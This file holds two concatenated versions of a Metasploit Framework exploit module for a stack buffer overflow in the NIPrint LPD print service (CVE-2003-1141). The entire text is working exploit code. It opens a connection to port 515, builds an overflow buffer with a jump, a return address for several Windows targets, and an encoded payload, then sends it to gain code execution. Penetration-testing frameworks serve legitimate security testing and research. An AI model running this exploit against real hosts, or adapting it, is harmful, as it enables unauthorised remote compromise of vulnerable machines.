==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/lpd/niprint.rb <==
##
# $Id: niprint.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'NIPrint LPD Request Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the
				Network Instrument NIPrint LPD service. Inspired by
				Immunity's VisualSploit :-)
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					['CVE', '2003-1141'],
	  				['OSVDB', '2774'],
					['BID', '8968'],
					['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
				],
			'Privileged'     => false,

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
				],

			'DefaultTarget' => 0))
			
			register_options( [ Opt::RPORT(515) ], self.class )
	end

	def exploit
		connect
		
		req = rand_text_alphanumeric(8192)
		req[  0, 2] = "\xeb\x33"
		req[ 49, 4] = [target.ret].pack('V')
		req[ 53, payload.encoded.length ] = payload.encoded
		
		print_status("Trying target #{target.name}...")
		sock.put(req)
		
		handler
		disconnect
	end

end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/lpd/niprint.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NIPrint LPD Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the
				Network Instrument NIPrint LPD service. Inspired by
				Immunity's VisualSploit :-)
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-1141'],
					['OSVDB', '2774'],
					['BID', '8968'],
					['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
					['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
					['Windows 7 x64', { 'Ret' => 0x763B35DD }],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Nov 05 2003'))

		register_options(
			[
				Opt::RPORT(515)
			], self.class )
	end

	def exploit
		connect

		req = rand_text_alphanumeric(8192)
		req[  0, 2] = "\xeb\x33"
		req[ 49, 4] = [target.ret].pack('V')
		req[ 53, payload.encoded.length ] = payload.encoded

		print_status("Trying target #{target.name}...")
		sock.put(req)

		handler
		disconnect
	end

end
